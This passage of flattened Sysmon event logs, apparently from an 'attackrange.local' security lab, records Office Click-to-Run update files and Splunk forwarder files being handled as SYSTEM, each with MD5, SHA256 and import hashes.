Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoadfsb.exeMD5=526BC778F34B4CE46C8FEBF2F703D566,SHA256=E39E98595147952B32F9A91B804D507D49B87FDB964655E86509607430F64CF0,IMPHASH=148F298C77D31769AD3B55D1E08F87DBtruetrue 23542300x800000000000000070097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOADFPS.DLLMD5=B6756650B56B8767F5E4C8A2DD17E8ED,SHA256=668582C9A84E8DC5CDAA95482685C7DFA6D8A68102B00FE7F1AF8D63B2619680,IMPHASH=CD344D3B6CC6DF52CB613C7B3627F8EEtruetrue 23542300x800000000000000070096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSO0127.ACLMD5=710C7F4F02BC6A59916C5933DCCABC09,SHA256=1C4C88388E54D9DFC18F4040DC9F16C07E6C65FDB808B21376496E409967BD52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSO.FRAMEPROTOCOLWIN32.DLLMD5=2B07A9246DB1331D731D52779FCD1585,SHA256=ABA11F4F0DBED8D653F72662E2DC9B37E699D43A0726737A66BFCBC8D979C4B5,IMPHASH=8FB53E573CB4A86B304A290D6B2C1EA7truetrue 23542300x800000000000000070094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msix.dllMD5=8322D420490A1ECCD2B2CD93557F91F4,SHA256=97667DD7CD528E0BC26E90C42BB877D92A0B3DF8CEE63C25569B2AC6CC070F8D,IMPHASH=9E49C5E4B116FDE878586F791AB485C7truetrue 23542300x800000000000000070093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msfad.dllMD5=283963C37ADF3E5C953A88468C308AF4,SHA256=A12EC4DD4E0969A484097D7C67D054D7A7E9ED8E3839334C1986C296FCFDF251,IMPHASH=2A0A823BE2D9717E313C2DAADFA4F406truetrue 23542300x800000000000000070092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7tkjp.dllMD5=CA32C9B976EA1838E9BB0CAC2C513764,SHA256=4D694A31E546D327D5599A1F7E6FD619B60EF72C9AE1454FCF3FC2EB0D1F6072,IMPHASH=30143145271B9AF0CAD8C8C81BC4BE2Btruetrue 23542300x800000000000000070091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7tk.dllMD5=30D8DA06A133BEB840B881E52E39009E,SHA256=1AA1E1EAE8305392C8390D12ADBE4833DFFB36BE08E86DF52A523551AF3D8C8B,IMPHASH=71ACECB9087E2812914003A9938F3C5Etruetrue 23542300x800000000000000070090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7jp.kicMD5=7EBC7A6B7EF05099B13BDBF9B43057C5,SHA256=B4C6ACD95E5C1EF6B44341F53DAA4A008AF1CE18166198741B5E8F0B04422D0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7ge.kicMD5=D9C132D286E06E10E90E3C7DBA2F3DA3,SHA256=045560F6AB5E7BF19485D91B8D4C87AC9903C3A7D21C1F7B78385D09085E7936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7fr.kicMD5=F65A4820FD347AE56A4BC3B5CEE438AA,SHA256=56BF5CB0DE386F8CAE3A8B1A02AC5D07D43938D1E1CD74470F4A46B229F33337,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7es.kicMD5=9A9454DAB84AA98C34425BB5649B1188,SHA256=954BD77BBC74A05B7AF59F31E8B4FC7AB2A2713F338901B7B1244CD7F0AEF077,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7en.kicMD5=D99939E3CF79AD40C03CCC9BE2B8A92C,SHA256=F31F55D08362C73B2117051253B1FDDE43A6735991FCC563E2A0E21C0D86168E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7db.kicMD5=8E0B47B1992779E12B86561D6A88886E,SHA256=6DE0823DC2D66E11245DEBCE59DC5880E15378A137E2D42A96CB7329D6B40064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049773Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:31.991{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72E54F20498BF2643FCA525CDEFC989F,SHA256=ABBB8EB66FA3B3FFCED620A069CAE8D1706D122A9BA6F377A89713B6BBFE950D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NPSPWRAP.DLLMD5=01BA4DB55CA09E59B5912BACB29E2254,SHA256=7C17FC77D32BD426F7B0D95FBBB1C36E4947C4C0B940E24BAA42D73A8F151C71,IMPHASH=DEECDE360B3B4C269C922EBE8172D93Btruetrue 23542300x800000000000000070155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7Models0011.DLLMD5=4D42A9DE898ECF9DBB493E0C7223428F,SHA256=9F046900674475A4670BEE751429A5B558FF88262177684C72D99530452A1813,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7MODELS000C.dllMD5=0AEA3C7BD534A061DE993DCB174BE9AA,SHA256=09173905B5DE7F95F4E3DBAB4334C65CAE72AA3B628802C1BA0382AEC37AB208,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.814{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DB05A6F39601584FC9D7B2D5447093F,SHA256=3CE48F12D4B07C0C7F6F5B130FE4CB6F972D38F1DD93A0075BF4CEE28F87E72A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7MODELS000A.dllMD5=A7B3971093E24D49F1DA1925280F3E05,SHA256=028C57DDAAAC5BF2538C73A0C4B85402C2A5C54D7E75874F4EC641F6D9CA8765,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7MODELS0009.dllMD5=5F44BCC884D2D9B89DF201C87E4730B0,SHA256=19ABEBB5C9048D79D3BCD0C66E69126B9A1766E6AE786B5A6ED308F3B56ED702,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7Lexicons0011.DLLMD5=03776018BCDC3C6729A257755A19BE15,SHA256=6FED02868FB94DD8898A3A5E4113D5278730B241835CD872506C9BC7EE0904EF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7Data0011.DLLMD5=36C1878BFE0BF2DD30EFAD7140FEDFA5,SHA256=48561E9D7BD2F69D51DB43F8C6D8200F1327280AF3F32F18CF9BE1DCF1070EDC,IMPHASH=A91B5D5E5EA4D83A0A4F3C615B4F9488truetrue 23542300x800000000000000070148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NativeHostPollApp.xapMD5=A1D4551E5F41182B19EBD4413C0A2773,SHA256=7838DF9E160E7B342EDC1DE0A808E7A06532B59C49C69F475AF3BE4EAC04ECEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NativeHostAnnotationApp.xapMD5=CFE8A6B4AB80C45ABBD22397789B0C62,SHA256=7D0C7B1D5CDBF95545C0A1156A1C5CA1FE19F9EE6E7F1DAFD120BDB611DD29C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NAMECONTROLSERVER.EXEMD5=94E2D36A73C5373FF6C35CE546D71EAD,SHA256=9B78580344FDF8C5D66C30132BC139BB70558368FC332643FA0F737051784737,IMPHASH=34566375B4D51B50CA697652BBD374D8truetrue 23542300x800000000000000070145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NAMECONTROLPROXY.DLLMD5=321CB8FD4DC8172DB63B71507A1AE1CE,SHA256=C5D7C4DDAEAB464CBA1EB44D2C2E3E8D54C05981C3006D39CEC61EE012AF4C15,IMPHASH=336EB7921D8066FA0436197339DE5750truetrue 23542300x800000000000000070144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NAME.DLLMD5=1530DFC88E5556295EF1EEE7A9FB6964,SHA256=A651B1CD300949813FFB3B4A5DF52C2050762AF88461C6F0A9EB8F54193030BE,IMPHASH=9C2E1912032E0CF3CFB72B2810D30C2Ftruetrue 23542300x800000000000000070143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MYSL.ICOMD5=8F06D16F1AA61652E04A37FEA4FBF9B9,SHA256=37A9CF919C2E5AB77F3A371A44E1CED62E32B78C6CEC67A7C1BBD58989458142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\muauth.cabMD5=14709A0DBA0501680EBF26433F66A8DB,SHA256=297C2D05B0F80C0D9CDDCA89ED49362122AA198F0311B570BABBB238829EA572,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSZIP.DICMD5=BD504AF3CFC367566967BE4B136239A8,SHA256=3B32473ACE075ACF2EFEDA7D34F812F0B14C7602EA1880085ECA35D6AEF75C45,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSYUBIN7.DLLMD5=4879CE2C76C7D0B29C8948FFF5EE2075,SHA256=A443C78126935B0B16B11B7C9341C3C2B86FD174F92E92F2A53523F8359F8952,IMPHASH=E0FE2A1D5B8CA01F50BBFE7ADE5CD37Etruetrue 23542300x800000000000000070139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSWORD.OLBMD5=5E4604A0710415820DAD49F782147085,SHA256=BA02C325B4B27278119B5B490DB45E9F9F25A96E65FFD5352CFC69526A7F1EFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msvcr120.dllMD5=49FB6E786B2F9DF8812E0E317CED55CB,SHA256=9461F2E4ADD5C650102ACDE0C62377FF86D9B19FC20D0003F326CCD474E8B7B9,IMPHASH=8F18E22935EF8B336E246EE763FBEC97truetrue 23542300x800000000000000070137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSVCP140_APP.DLLMD5=6FB5A8B31B38B7C5A158201BDD343B74,SHA256=B67DDFFD73AF5FAAF4C1BA590BA966C260880FE154E07CFCE3C4E5CB5B0E86AB,IMPHASH=E5BF45AB1D834FCCC96842C6063C5D04truetrue 23542300x800000000000000070136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4,IMPHASH=C0E775D13A8146396B3DE4DC441694A7truetrue 23542300x800000000000000070135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msvcp120.dllMD5=8C8D1140787DA60A343DD11C1CDF4992,SHA256=6AA1ECE9DD340D05AEC43248592A78B70D21959DE8727F506D21A3A962348583,IMPHASH=D0A59246EAB41D54812CD63C2326E1F1truetrue 23542300x800000000000000070134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSRTEDIT.DLLMD5=52FFB24D45CBBE28D70B86A362B7B7E5,SHA256=F42943E6E0D125B51C19035B963A441CB3190D2E1002362373D425ACDF82CC6D,IMPHASH=D4187D00AEDB4C955B56225949E95715truetrue 23542300x800000000000000070133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSQRY32.EXEMD5=6E780BA6B2BF2624AB0733483735AC68,SHA256=D5B2E6DC0F9DC4FD7B168A1A805F3365E4F527F7628523AA7DAF76F62CA488F1,IMPHASH=E006178F2581E9D9331273B85282DF61truetrue 23542300x800000000000000070132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPUB.VisualElementsManifest.xmlMD5=6BE78F94B5DE1E4A6BFDD0D1F07DB74D,SHA256=E7BB4DCCA5941C96370DB96BA81438027518F112F978CE3121EE0785ADE1CF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPUB.TLBMD5=E9A917196E5E51A3B1DE7777857207A0,SHA256=BA26537BF7CD18E7C4C01A12ACAF0A754CEB3AC852A40FA67562CBAC9F52C3CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mspub.exe.manifestMD5=3E05BCB1DC9E3D97763BFBB916E0917B,SHA256=F52B24F9FC424BB48C5A3E97247BA834A78AA1C1472B5A78290891C1AC6D4F95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPUB.EXEMD5=520BABE0C97DB48F17C499CEC1C0F8ED,SHA256=7F44E8C694A7F3E0FF58C4B388EA5A8D400B22CB18C1598302A68BA4946FC0AF,IMPHASH=0814135151D01DB39C1754FBA3914D9Etruetrue 23542300x800000000000000070128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPST32.DLLMD5=3A596B109669CBA20054F8122994D82E,SHA256=23820A57A8F82693C5B3DF7AD2C5A6CA729F8770560E7634FE015999C6677A96,IMPHASH=DCF195D2FCB33E0D1832BFFC98CC77ACtruetrue 23542300x800000000000000070127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msproof7.dllMD5=13A3C7D61A62995056D18886AD996779,SHA256=AAB0056E3AA43C0044DAC2AB26DB921127B353E34BEB0B5641D94B7C9F93F537,IMPHASH=9FE35B938C95E4FAEE3E16727386FC5Dtruetrue 23542300x800000000000000070126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 